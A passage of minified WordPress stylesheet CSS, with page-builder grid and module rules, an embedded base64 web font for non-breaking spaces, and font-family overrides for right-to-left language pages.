(min-width:768px){.sek-container{max-width:720px}}@media (min-width:992px){.sek-container{max-width:960px}}@media (min-width:1200px){.sek-container{max-width:1140px}}.sek-container-fluid{width:100%;padding-right:10px;padding-left:10px;margin-right:auto;margin-left:auto}.sek-row{display:flex;flex-wrap:wrap;margin-right:-10px;margin-left:-10px}.sek-container-no-padding{padding-right:0;padding-left:0;overflow-x:hidden}.sek-no-gutters{margin-right:0;margin-left:0}.sek-no-gutters>.sek-col,.sek-no-gutters>[class*=sek-col-]{padding-right:0;padding-left:0}.sek-col,.sek-col-10,.sek-col-100,.sek-col-11,.sek-col-12,.sek-col-14,.sek-col-16,.sek-col-20,.sek-col-25,.sek-col-30,.sek-col-33,.sek-col-40,.sek-col-50,.sek-col-60,.sek-col-66,.sek-col-70,.sek-col-75,.sek-col-8,.sek-col-80,.sek-col-83,.sek-col-9,.sek-col-90,.sek-col-auto,.sek-col-base{position:relative;width:100%;min-height:1px;padding-right:10px;padding-left:10px}.sek-col-base{flex:0 0 100%;max-width:100%}.sek-col{flex-basis:0;flex-grow:1;max-width:100%}.sek-col-auto{flex:0 0 auto;width:auto;max-width:100%}@media (min-width:768px){.sek-col-8{flex:0 0 8.333%;max-width:8.333%}.sek-col-9{flex:0 0 9.090909%;max-width:9.090909%}.sek-col-10{flex:0 0 10%;max-width:10%}.sek-col-11{flex:0 0 11.111%;max-width:11.111%}.sek-col-12{flex:0 0 12.5%;max-width:12.5%}.sek-col-14{flex:0 0 14.285%;max-width:14.285%}.sek-col-16{flex:0 0 16.666%;max-width:16.666%}.sek-col-20{flex:0 0 20%;max-width:20%}.sek-col-25{flex:0 0 25%;max-width:25%}.sek-col-30{flex:0 0 30%;max-width:30%}.sek-col-33{flex:0 0 33.333%;max-width:33.333%}.sek-col-40{flex:0 0 40%;max-width:40%}.sek-col-50{flex:0 0 50%;max-width:50%}.sek-col-60{flex:0 0 60%;max-width:60%}.sek-col-66{flex:0 0 66.666%;max-width:66.666%}.sek-col-70{flex:0 0 70%;max-width:70%}.sek-col-75{flex:0 0 75%;max-width:75%}.sek-col-80{flex:0 0 80%;max-width:80%}.sek-col-83{flex:0 0 83.333%;max-width:83.333%}.sek-col-90{flex:0 0 90%;max-width:90%}.sek-col-100{flex:0 0 100%;max-width:100%}.sek-order-first{order:-1}.sek-order-last{order:13}.sek-order-0{order:0}.sek-order-1{order:1}.sek-order-2{order:2}.sek-order-3{order:3}.sek-order-4{order:4}.sek-order-5{order:5}.sek-order-6{order:6}.sek-order-7{order:7}.sek-order-8{order:8}.sek-order-9{order:9}.sek-order-10{order:10}.sek-order-11{order:11}.sek-order-12{order:12}}.sek-clearfix::after{display:block;clear:both;content:""}.sek-sr-only{position:absolute;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);white-space:nowrap;border:0}.sek-sr-only-focusable:active,.sek-sr-only-focusable:focus{position:static;width:auto;height:auto;overflow:visible;clip:auto;white-space:normal}.sek-embed{position:relative}.sek-embed::before{display:block;content:''}.sek-embed .sek-embed-inner,.sek-embed iframe{position:absolute;width:100%;height:100%;top:0;left:0}.sektion-wrapper{word-wrap:break-word}.sek-text-right{text-align:right!important}.sek-text-left{text-align:left!important}.sek-module .sek-module-inner ul{list-style:disc}.sek-module .sek-module-inner ol{list-style:decimal}.sek-module .sek-module-inner ol>li::before{content:none}.sek-module .sek-module-inner ol,.sek-module .sek-module-inner ul{padding:0;line-height:1.5;margin:0 0 1.5rem 3rem}.sek-module .sek-module-inner ol>li,.sek-module .sek-module-inner ul>li{padding:.15rem .25rem}.sek-module .sek-module-inner li>ol,.sek-module .sek-module-inner li>ul{margin-bottom:0}.sek-module-inner pre code,.sek-module-inner tt{box-sizing:border-box;font-size:inherit;white-space:pre-wrap!important;background:0 0;border:none;padding:0;font-family:monospace}.sek-module-inner pre{background:#f7f8f9;padding:2.5em;word-wrap:normal;white-space:pre-wrap!important;color:#313131;font-family:monospace!important}.sek-module-inner figure{text-align:center}.sek-module-inner figcaption{text-align:center}.sek-module-inner cite{color:#313131;font-weight:300;font-style:normal;position:relative;display:inline-block}.sek-module-inner .wp-block-table.is-style-stripes tbody tr:nth-child(odd),.sek-module-inner :root .has-subtle-background-background-color,.sek-module-inner caption,.sek-module-inner code,.sek-module-inner kbd,.sek-module-inner samp{background-color:#dbdbdb}.sek-module-inner sub{bottom:-.25em}.sek-module-inner sub,.sek-module-inner sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sek-module-inner blockquote{border-left:5px solid rgba(0,0,0,.1);background:0 0;font-size:1.2em;font-style:inherit;margin-right:0;margin-left:0;padding:15px}.sek-module-inner table{width:100%;border-collapse:collapse}@media (max-width:767.98px){.sek-module-inner table{table-layout:fixed}}.sek-module-inner table:not([id^=wp-calendar]):not(.ui-datepicker-calendar):not(.tribe-mini-calendar){border:2px solid #eceeef}.sek-module-inner table:not([id^=wp-calendar]):not(.ui-datepicker-calendar):not(.tribe-mini-calendar) th{text-transform:uppercase;letter-spacing:2px;font-family:sans-serif}.sek-module-inner table:not([id^=wp-calendar]):not(.ui-datepicker-calendar):not(.tribe-mini-calendar) td,.sek-module-inner table:not([id^=wp-calendar]):not(.ui-datepicker-calendar):not(.tribe-mini-calendar) th{font-size:.95em;padding:1.25em;border:1px solid #eceeef}.sek-module-inner table:not([id^=wp-calendar]):not(.ui-datepicker-calendar):not(.tribe-mini-calendar) td{color:#777}.sek-search-form{float:none}.sek-search-form .sek-search-form-group{display:-webkit-box;display:-ms-flexbox;display:flex}.sek-search-form .sek-search-form-group label{position:relative;margin-right:5px}.sek-search-form .sek-search-form-group label input[type=search]{max-width:100%;margin:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;-webkit-border-radius:0;border-radius:0;background:#fff;border:2px solid #ddd;color:#777;display:block;max-width:100%;padding:7px 8px;padding-left:5px;line-height:1.5em;width:100%}.sek-search-form .sek-search-form-group [type=submit]{line-height:15px;margin:0;background:grey!important;color:#fff;font-size:16px;padding:10px 10px;font-weight:400;display:inline-block;border:none;cursor:pointer;border-radius:3px}.sek-module .sek-module-inner .sek-btn{display:inline-block;font-weight:400;line-height:1.25em;text-align:center;white-space:normal;word-break:break-all;vertical-align:middle;user-select:none;border:1px solid transparent;padding:.5em 1em;border-radius:2px;border-width:2px;border-style:solid;font-size:1em;cursor:pointer;text-decoration:none;text-transform:none;-webkit-transition:all .2s ease-in-out;-o-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.sek-module .sek-module-inner .sek-btn:focus,.sek-module .sek-module-inner .sek-btn:hover{text-decoration:none}.sek-module .sek-module-inner .focus.sek-btn,.sek-module .sek-module-inner .sek-btn:focus{outline:0;box-shadow:0 0 0 2px rgba(2,117,216,.25)}.sek-module .sek-module-inner .disabled.sek-btn,.sek-module .sek-module-inner .sek-btn:disabled{cursor:not-allowed;opacity:.65;box-shadow:none}.sek-module .sek-module-inner .active.sek-btn,.sek-module .sek-module-inner .sek-btn:active{background-image:none;box-shadow:0 0 0 2px rgba(2,117,216,.25)}a.sek-btn.disabled,fieldset[disabled] a.sek-btn{pointer-events:none}.sektion-wrapper [type=button],.sektion-wrapper [type=reset],.sektion-wrapper [type=submit],.sektion-wrapper button{-webkit-appearance:button}.sektion-wrapper [type=button]::-moz-focus-inner,.sektion-wrapper [type=reset]::-moz-focus-inner,.sektion-wrapper [type=submit]::-moz-focus-inner,.sektion-wrapper button::-moz-focus-inner{padding:0;border-style:none}[type=button].sek-btn,[type=reset].sek-btn,[type=submit].sek-btn,button.sek-btn{-wekbit-appearance:none!important;background:0 0}[data-sek-level=module] .sek-module-inner .wp-caption figcaption{color:#6d6d6d;font-style:italic;max-width:100%;font-size:14px;font-weight:500;line-height:1.4;padding:4px;margin-top:1rem}[data-sek-level=module] .sek-module-inner figure{display:block}[data-sek-level=module] .sek-module-inner .wp-block-image .aligncenter,[data-sek-level=module] .sek-module-inner .wp-block-image .alignleft,[data-sek-level=module] .sek-module-inner .wp-block-image .alignright{display:table}[data-sek-level=module] .sek-module-inner .wp-block-image figcaption{font-size:13px;text-align:center}[data-sek-level=module] .sek-module-inner .wp-block-gallery,[data-sek-level=module] .sek-module-inner ul.blocks-gallery-grid{margin-left:0}[data-sek-level=module] .sek-module-inner [class*=wp-block-]:not(:last-child){margin-bottom:1.5em}.sek-col-100 .sek-module-inner .alignfull{margin-left:calc(-100vw / 2 + 100% / 2);margin-right:calc(-100vw / 2 + 100% / 2);max-width:100vw;width:auto}.sek-col-100 .sek-module-inner .alignwide{margin-left:calc((100% - 80vw)/ 2);width:80vw;max-width:80vw}[data-sek-level=module] .sek-module-inner .aligncenter,[data-sek-level=module] .sek-module-inner .aligncenter img{display:block;margin-left:auto;margin-right:auto}[data-sek-level=module] .sek-module-inner .alignleft{float:left}[data-sek-level=module] .sek-module-inner .alignright{float:right}[data-sek-level=module] .sek-module-inner .aligncenter,[data-sek-level=module] .sek-module-inner .alignleft,[data-sek-level=module] .sek-module-inner .alignnone,[data-sek-level=module] .sek-module-inner .alignright{margin-top:1.5rem;margin-right:auto;margin-bottom:1.5rem;margin-left:auto}[data-sek-level=module] .sek-module-inner [role=search].search-form{display:-webkit-box;display:-ms-flexbox;display:flex;max-width:100%;float:right}@media (max-width:767.98px){[data-sek-level=module] .sek-module-inner [role=search].search-form{float:none}}[data-sek-level=module] .sek-module-inner [role=search].search-form label{position:relative;-webkit-box-flex:1;-ms-flex:1;flex:1;margin-right:5px}[data-sek-level=module] .sek-module-inner [role=search].search-form label input{padding-left:5px;line-height:20px;width:100%;max-width:185px;min-width:80px}@media (max-width:767.98px){[data-sek-level=module] .sek-module-inner [role=search].search-form label input{max-width:none}}[data-sek-level=module] .sek-module-inner [role=search].search-form input[type=submit]{line-height:15px}[data-sek-level=module] .sek-module-inner input[type=submit]{background:grey;color:#fff;padding:10px 10px;font-weight:400;display:inline-block;border:none;cursor:pointer;-webkit-border-radius:3px;border-radius:3px}[data-sek-level=module] .sek-module-inner .search-form input[type=search]{margin:0;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;-webkit-border-radius:0;border-radius:0;background:#fff;border:2px solid #ddd;color:#777;display:block;max-width:100%;padding:7px 8px}.sektion-wrapper.sek-password-protected{display:flex;align-items:center;justify-content:center;-ms-flex-direction:column;flex-direction:column}.sektion-wrapper.sek-password-protected form.post-password-form{max-width:450px;height:auto;padding:4em 1em;font-size:1em}.sektion-wrapper .sek-module-inner .avatar{border-radius:50%}.sek-next-post-link::after,.sek-previous-post-link::before{width:15px;height:10px;display:inline-block;position:relative;vertical-align:middle;border-top:6px solid transparent;border-bottom:6px solid transparent;border-left-color:inherit;border-right-color:inherit}.sek-previous-post-link::before{content:'';border-right:6px solid;right:7px}.sek-next-post-link::after{content:'';border-left:6px solid;left:7px}[data-sek-module-type=czr_divider_module]{text-align:center}[data-sek-module-type=czr_divider_module] .sek-module-inner{font-size:0;line-height:0}.sek-module-inner .sek-divider{border-top:1px solid #5a5a5a;display:inline-block;width:100%;margin-top:15px;margin-bottom:15px;font-size:1rem}.sek-module-inner .sek-spacer{height:20px}[data-sek-module-type=czr_tiny_mce_editor_module] a{text-decoration:underline}[data-sek-module-type=czr_shortcode_module] [data-sek-use-flexbox=true]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.sek-module-inner{line-height:1.5em}.sek-module-inner h1,.sek-module-inner h2,.sek-module-inner h3,.sek-module-inner h4,.sek-module-inner h5,.sek-module-inner h6,.sek-module-inner p{line-height:1.5em;font-weight:400;margin:.6em 0}.sek-module-inner h1{font-size:2.48em}.sek-module-inner h2{font-size:2.07em}.sek-module-inner h3{font-size:1.73em}.sek-module-inner h4{font-size:1.44em}.sek-module-inner h5{font-size:1.2em}.sek-module-inner h6{font-size:1em}.sek-module-inner p{margin:0 0 1em;padding:0}.sek-module-inner a{text-decoration:none;-webkit-box-shadow:none;box-shadow:none;-webkit-transition:color .2s ease-in-out;-o-transition:color .2s ease-in-out;transition:color .2s ease-in-out}.sek-module-inner img{height:auto;max-width:100%;border:none;-webkit-border-radius:0;border-radius:0;-webkit-box-shadow:none;box-shadow:none}[data-sek-module-type=czr_accordion_module] .sek-module-inner a:not(.wp-block-button__link),[data-sek-module-type=czr_shortcode_module] .sek-module-inner a:not(.wp-block-button__link),[data-sek-module-type=czr_simple_html_module] .sek-module-inner a:not(.wp-block-button__link),[data-sek-module-type=czr_tiny_mce_editor_module] .sek-module-inner a:not(.wp-block-button__link){text-decoration:underline}body .sektion-wrapper .sek-row [data-sek-level=module] .sek-module-inner a:not(.sek-btn):not(.button):focus{background:0 0}body .sek-module-inner h1:before,body .sek-module-inner h2:before,body .sek-module-inner h3:before,body .sek-module-inner h4:before,body .sek-module-inner h5:before,body .sek-module-inner h6:before{content:none;background:0 0} @charset "UTF-8";@font-face{font-family:'NonBreakingSpaceOverride';src:url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAAAMoAA0AAAAACDQAAALTAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4GYACCahEICjx3CywAATYCJANUBCAFhiEHgWwbXQfILgpsY+rQRRARwyAs6uL7pxzYhxEE+32b3aeHmifR6tklkS9hiZA0ewkqGRJE+H7/+6378ASViK/PGeavqJyOzsceKi1s3BCiQsiOdn1r/RBgIJYEgCUhbm/8/8/h4saPssnTNkkiWUBrTRtjmQSajw3Ui3pZ3LYDPD+XG2C3JA/yKAS8/rU5eNfuGqRf4eNNgV4YAlIIgxglEkWe6FYpq10+wi3g+/nUgvgPFczNrz/RsTgVm/zfbPuHZlsuQECxuyqBcQwKFBjFgKO8AqP4bAN9tFJtnM9xPcbNjeXS/x1wY/xU52f5W/X1+9cnH4YwKIaoRRAkUkj/YlAAeF/624foiIDBgBmgQBeGAyhBljUPZUm/l2dTvmpqcBDUOHdbPZWd8JsBAsGr4w8/EDn82/bUPx4eh0YNrQTBuHO2FjQEAGBwK0DeI37DpQVqdERS4gZBhpeUhWCfLFz7J99aEBgsJCHvUGAdAPp4IADDCAPCEFMGpMZ9AQpTfQtQGhLbGVBZFV8BaqNyP68oTZgHNj3M8kBPfXTTC9t90UuzYhy9ciH0grVlOcqyCytisvbsERsEYztiznR0WCrmTksJwbSNK6fd1Rvr25I9oLvctUoEbNOmXJbqgYgPXEHJ82IUsrCnpkxh23F1rfZ2zcRnJYoXtauB3VTFkFXQg3uoZYD5qE0kdjDtoDoF1h2bulGmev5HbYhbrjtohQSRI4aNOkffIcT+d3v6atpaYh3JvPoQsztCcqvaBkppDSPcQ3bw3KaCBo1f5CJWTZEgW3LjLofYg51MaVezrx8xZitYbQ9KYeoRaqQdVLwSEfrKXLK1otCWOKNdR/YwYAfon5Yk8O2MJfSD10dPGA5PIJJQMkah0ugMJiv6x4Dm7LEa8xnrRGGGLAg4sAlbsA07sAt76DOsXKO3hIjtIlpnnFrt1qW4kh6NhS83P/6HB/fl1SMAAA==) format("woff2"),url(data:application/font-woff;charset=utf-8;base64,d09GRgABAAAAAAUQAA0AAAAACDQAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAAE9AAAABwAAAAchf5yU0dERUYAAATYAAAAHAAAAB4AJwAbT1MvMgAAAaAAAABJAAAAYJAcgU5jbWFwAAACIAAAAF4AAAFqUUxBZ2dhc3AAAATQAAAACAAAAAgAAAAQZ2x5ZgAAApAAAAAyAAAAPL0n8y9oZWFkAAABMAAAADAAAAA2Fi93Z2hoZWEAAAFgAAAAHQAAACQOSgWaaG10eAAAAewAAAAzAAAAVC7TAQBsb2NhAAACgAAAABAAAAAsAOQBAm1heHAAAAGAAAAAHQAAACAAWQALbmFtZQAAAsQAAAF6AAADIYvD/Adwb3N0AAAEQAAAAI4AAADsapk2o3jaY2BkYGAA4ov5mwzj+W2+MnCzXwCKMNzgCBSB0LfbQDQ7AxuI4mBgAlEAFKQIRHjaY2BkYGD3+NvCwMDBAALsDAyMDKhAFAA3+wH3AAAAeNpjYGRgYBBl4GBgYgABEMnIABJzAPMZAAVmAGUAAAB42mNgZlJhnMDAysDCKsKygYGBYRqEZtrDYMT4D8gHSmEHjgUFOQwODAqqf9g9/rYwMLB7MNUAhRlBcsxBrMlASoGBEQAj8QtyAAAAeNrjYGBkAAGmWQwMjO8gmBnIZ2NA0ExAzNjAAFYJVn0ASBsD6VAIDZb7AtELAgANIgb9AHjaY2BgYGaAYBkGRgYQSAHyGMF8FgYPIM3HwMHAxMDGoMCwQIFLQV8hXvXP//9AcRCfAcb///h/ygPW+w/vb7olBjUHCTCyMcAFGZmABBO6AogThgZgIUsXAEDcEzcAAHjaY2BgECMCyoEgACZaAed42mNgYmRgYGBnYGNgYAZSDJqMgorCgoqCjECRXwwNrCAKSP5mAAFGBiRgyAAAi/YFBQAAeNqtkc1OwkAUhU/5M25cEhcsZick0AwlBJq6MWwgJkAgYV/KAA2lJeUn+hY+gktXvpKv4dLTMqKycGHsTZNv7px7z50ZAFd4hYHjdw1Ls4EiHjVncIFnzVnc4F1zDkWjrzmPW+NNcwGlzIRKI3fJlUyrEjZQxb3mDH2fNGfRx4vmHKqG0JzHg6E0F9DOlFBGBxUI1GEzLNT4S0aLuTtsGAEUuYcQHkyg3KmIum1bNUvKlrjbbAIleqHHnS4iSudpQcySMYtdFiXlAxzSbAwfMxK6kZoHKhbjjespMTioOPZnzI+4ucCeTVyKMVKLfeAS6vSWaTinuZwzyy/Dc7vaed+6KaV0kukdPUk6yOcctZPvvxxqksq2lEW8RvHjMEO2FCl/zy6p3NEm0R9OFSafJdldc4QVeyaaObMBO0/5cCaa6d9Ggyubxire+lEojscdjoWUR1xGOy8KD8mG2ZLO2l2paDc3A39qmU2z2W5YNv5+u79e6QfGJY/hAAB42m3NywrCMBQE0DupWp/1AYI7/6DEaLQu66Mrd35BKUWKJSlFv1+rue4cGM7shgR981qSon+ZNwUJ8iDgoYU2OvDRRQ99DDDECAHGmGCKmf80hZSx/Kik/LliFbtmN6xmt+yOjdg9GztV4tROnRwX/Bsaaw51nt4Lc7tWaZYHp/MlzKx51LZs5htNri+2AAAAAQAB//8AD3jaY2BkYGDgAWIxIGZiYARCESBmAfMYAAR6AEMAAAABAAAAANXtRbgAAAAA2AhRFAAAAADYCNuG) format("woff")}body:lang(ar),button:lang(ar),input:lang(ar),select:lang(ar),optgroup:lang(ar),textarea:lang(ar),.author-description .author-link:lang(ar),.comment-metadata:lang(ar),.comment-reply-link:lang(ar),.comments-title:lang(ar),.comment-author .fn:lang(ar),.discussion-meta-info:lang(ar),.entry-meta:lang(ar),.entry-footer:lang(ar),.main-navigation:lang(ar),.no-comments:lang(ar),.not-found .page-title:lang(ar),.error-404 .page-title:lang(ar),.post-navigation .post-title:lang(ar),.page-links:lang(ar),.page-description:lang(ar),.pagination .nav-links:lang(ar),.sticky-post:lang(ar),.site-title:lang(ar),.site-info:lang(ar),#cancel-comment-reply-link:lang(ar),h1:lang(ar),h2:lang(ar),h3:lang(ar),h4:lang(ar),h5:lang(ar),h6:lang(ar),.page-title:lang(ar),blockquote cite:lang(ar),table:lang(ar),.button:lang(ar),input:lang(ar)[type=button],input:lang(ar)[type=reset],input:lang(ar)[type=submit],.comment-navigation .nav-previous:lang(ar),.comment-navigation .nav-next:lang(ar),.comment-list .pingback .comment-body:lang(ar),.comment-list .trackback .comment-body:lang(ar),.comment-list .pingback .comment-body .comment-edit-link:lang(ar),.comment-list .trackback .comment-body .comment-edit-link:lang(ar),.comment-form .comment-notes:lang(ar),.comment-form label:lang(ar),.widget_archive ul li:lang(ar),.widget_categories ul li:lang(ar),.widget_meta ul li:lang(ar),.widget_nav_menu ul li:lang(ar),.widget_pages ul li:lang(ar),.widget_recent_comments ul li:lang(ar),.widget_recent_entries ul li:lang(ar),.widget_rss ul li:lang(ar),.widget_tag_cloud .tagcloud:lang(ar),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(ar),.entry .entry-content .wp-block-button .wp-block-button__link:lang(ar),.entry .entry-content .wp-block-archives li>a:lang(ar),.entry .entry-content .wp-block-categories li>a:lang(ar),.entry .entry-content .wp-block-latest-posts li>a:lang(ar),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(ar),.entry .entry-content .wp-block-verse:lang(ar),.entry .entry-content .has-drop-cap:lang(ar):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(ar),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(ar),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(ar),.entry .entry-content .wp-block-cover-image h2:lang(ar),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(ar),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(ar),.entry .entry-content .wp-block-cover h2:lang(ar),.entry .entry-content .wp-block-audio figcaption:lang(ar),.entry .entry-content .wp-block-video figcaption:lang(ar),.entry .entry-content .wp-block-image figcaption:lang(ar),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(ar),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(ar),.entry .entry-content .wp-block-file:lang(ar),.entry .entry-content .wp-block-file .wp-block-file__button:lang(ar),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(ar),.wp-caption-text:lang(ar),.gallery-caption:lang(ar){font-family:Tahoma,Arial,sans-serif}body:lang(ary),button:lang(ary),input:lang(ary),select:lang(ary),optgroup:lang(ary),textarea:lang(ary),.author-description .author-link:lang(ary),.comment-metadata:lang(ary),.comment-reply-link:lang(ary),.comments-title:lang(ary),.comment-author .fn:lang(ary),.discussion-meta-info:lang(ary),.entry-meta:lang(ary),.entry-footer:lang(ary),.main-navigation:lang(ary),.no-comments:lang(ary),.not-found .page-title:lang(ary),.error-404 .page-title:lang(ary),.post-navigation .post-title:lang(ary),.page-links:lang(ary),.page-description:lang(ary),.pagination .nav-links:lang(ary),.sticky-post:lang(ary),.site-title:lang(ary),.site-info:lang(ary),#cancel-comment-reply-link:lang(ary),h1:lang(ary),h2:lang(ary),h3:lang(ary),h4:lang(ary),h5:lang(ary),h6:lang(ary),.page-title:lang(ary),blockquote cite:lang(ary),table:lang(ary),.button:lang(ary),input:lang(ary)[type=button],input:lang(ary)[type=reset],input:lang(ary)[type=submit],.comment-navigation .nav-previous:lang(ary),.comment-navigation .nav-next:lang(ary),.comment-list .pingback .comment-body:lang(ary),.comment-list .trackback .comment-body:lang(ary),.comment-list .pingback .comment-body .comment-edit-link:lang(ary),.comment-list .trackback .comment-body .comment-edit-link:lang(ary),.comment-form .comment-notes:lang(ary),.comment-form label:lang(ary),.widget_archive ul li:lang(ary),.widget_categories ul li:lang(ary),.widget_meta ul li:lang(ary),.widget_nav_menu ul li:lang(ary),.widget_pages ul li:lang(ary),.widget_recent_comments ul li:lang(ary),.widget_recent_entries ul li:lang(ary),.widget_rss ul li:lang(ary),.widget_tag_cloud .tagcloud:lang(ary),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(ary),.entry .entry-content .wp-block-button .wp-block-button__link:lang(ary),.entry .entry-content .wp-block-archives li>a:lang(ary),.entry .entry-content .wp-block-categories li>a:lang(ary),.entry .entry-content .wp-block-latest-posts li>a:lang(ary),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(ary),.entry .entry-content .wp-block-verse:lang(ary),.entry .entry-content .has-drop-cap:lang(ary):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(ary),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(ary),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(ary),.entry .entry-content .wp-block-cover-image h2:lang(ary),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(ary),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(ary),.entry .entry-content .wp-block-cover h2:lang(ary),.entry .entry-content .wp-block-audio figcaption:lang(ary),.entry .entry-content .wp-block-video figcaption:lang(ary),.entry .entry-content .wp-block-image figcaption:lang(ary),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(ary),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(ary),.entry .entry-content .wp-block-file:lang(ary),.entry .entry-content .wp-block-file .wp-block-file__button:lang(ary),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(ary),.wp-caption-text:lang(ary),.gallery-caption:lang(ary){font-family:Tahoma,Arial,sans-serif}body:lang(azb),button:lang(azb),input:lang(azb),select:lang(azb),optgroup:lang(azb),textarea:lang(azb),.author-description .author-link:lang(azb),.comment-metadata:lang(azb),.comment-reply-link:lang(azb),.comments-title:lang(azb),.comment-author .fn:lang(azb),.discussion-meta-info:lang(azb),.entry-meta:lang(azb),.entry-footer:lang(azb),.main-navigation:lang(azb),.no-comments:lang(azb),.not-found .page-title:lang(azb),.error-404 .page-title:lang(azb),.post-navigation .post-title:lang(azb),.page-links:lang(azb),.page-description:lang(azb),.pagination .nav-links:lang(azb),.sticky-post:lang(azb),.site-title:lang(azb),.site-info:lang(azb),#cancel-comment-reply-link:lang(azb),h1:lang(azb),h2:lang(azb),h3:lang(azb),h4:lang(azb),h5:lang(azb),h6:lang(azb),.page-title:lang(azb),blockquote cite:lang(azb),table:lang(azb),.button:lang(azb),input:lang(azb)[type=button],input:lang(azb)[type=reset],input:lang(azb)[type=submit],.comment-navigation .nav-previous:lang(azb),.comment-navigation .nav-next:lang(azb),.comment-list .pingback .comment-body:lang(azb),.comment-list .trackback .comment-body:lang(azb),.comment-list .pingback .comment-body .comment-edit-link:lang(azb),.comment-list .trackback .comment-body .comment-edit-link:lang(azb),.comment-form .comment-notes:lang(azb),.comment-form label:lang(azb),.widget_archive ul li:lang(azb),.widget_categories ul li:lang(azb),.widget_meta ul li:lang(azb),.widget_nav_menu ul li:lang(azb),.widget_pages ul li:lang(azb),.widget_recent_comments ul li:lang(azb),.widget_recent_entries ul li:lang(azb),.widget_rss ul li:lang(azb),.widget_tag_cloud .tagcloud:lang(azb),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(azb),.entry .entry-content .wp-block-button .wp-block-button__link:lang(azb),.entry .entry-content .wp-block-archives li>a:lang(azb),.entry .entry-content .wp-block-categories li>a:lang(azb),.entry .entry-content .wp-block-latest-posts li>a:lang(azb),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(azb),.entry .entry-content .wp-block-verse:lang(azb),.entry .entry-content .has-drop-cap:lang(azb):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(azb),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(azb),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(azb),.entry .entry-content .wp-block-cover-image h2:lang(azb),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(azb),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(azb),.entry .entry-content .wp-block-cover h2:lang(azb),.entry .entry-content .wp-block-audio figcaption:lang(azb),.entry .entry-content .wp-block-video figcaption:lang(azb),.entry .entry-content .wp-block-image figcaption:lang(azb),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(azb),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(azb),.entry .entry-content .wp-block-file:lang(azb),.entry .entry-content .wp-block-file .wp-block-file__button:lang(azb),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(azb),.wp-caption-text:lang(azb),.gallery-caption:lang(azb){font-family:Tahoma,Arial,sans-serif}body:lang(ckb),button:lang(ckb),input:lang(ckb),select:lang(ckb),optgroup:lang(ckb),textarea:lang(ckb),.author-description .author-link:lang(ckb),.comment-metadata:lang(ckb),.comment-reply-link:lang(ckb),.comments-title:lang(ckb),.comment-author .fn:lang(ckb),.discussion-meta-info:lang(ckb),.entry-meta:lang(ckb),.entry-footer:lang(ckb),.main-navigation:lang(ckb),.no-comments:lang(ckb),.not-found .page-title:lang(ckb),.error-404 .page-title:lang(ckb),.post-navigation .post-title:lang(ckb),.page-links:lang(ckb),.page-description:lang(ckb),.pagination .nav-links:lang(ckb),.sticky-post:lang(ckb),.site-title:lang(ckb),.site-info:lang(ckb),#cancel-comment-reply-link:lang(ckb),h1:lang(ckb),h2:lang(ckb),h3:lang(ckb),h4:lang(ckb),h5:lang(ckb),h6:lang(ckb),.page-title:lang(ckb),blockquote cite:lang(ckb),table:lang(ckb),.button:lang(ckb),input:lang(ckb)[type=button],input:lang(ckb)[type=reset],input:lang(ckb)[type=submit],.comment-navigation .nav-previous:lang(ckb),.comment-navigation .nav-next:lang(ckb),.comment-list .pingback .comment-body:lang(ckb),.comment-list .trackback .comment-body:lang(ckb),.comment-list .pingback .comment-body .comment-edit-link:lang(ckb),.comment-list .trackback .comment-body .comment-edit-link:lang(ckb),.comment-form .comment-notes:lang(ckb),.comment-form label:lang(ckb),.widget_archive ul li:lang(ckb),.widget_categories ul li:lang(ckb),.widget_meta ul li:lang(ckb),.widget_nav_menu ul li:lang(ckb),.widget_pages ul li:lang(ckb),.widget_recent_comments ul li:lang(ckb),.widget_recent_entries ul li:lang(ckb),.widget_rss ul li:lang(ckb),.widget_tag_cloud .tagcloud:lang(ckb),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(ckb),.entry .entry-content .wp-block-button .wp-block-button__link:lang(ckb),.entry .entry-content .wp-block-archives li>a:lang(ckb),.entry .entry-content .wp-block-categories li>a:lang(ckb),.entry .entry-content .wp-block-latest-posts li>a:lang(ckb),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(ckb),.entry .entry-content .wp-block-verse:lang(ckb),.entry .entry-content 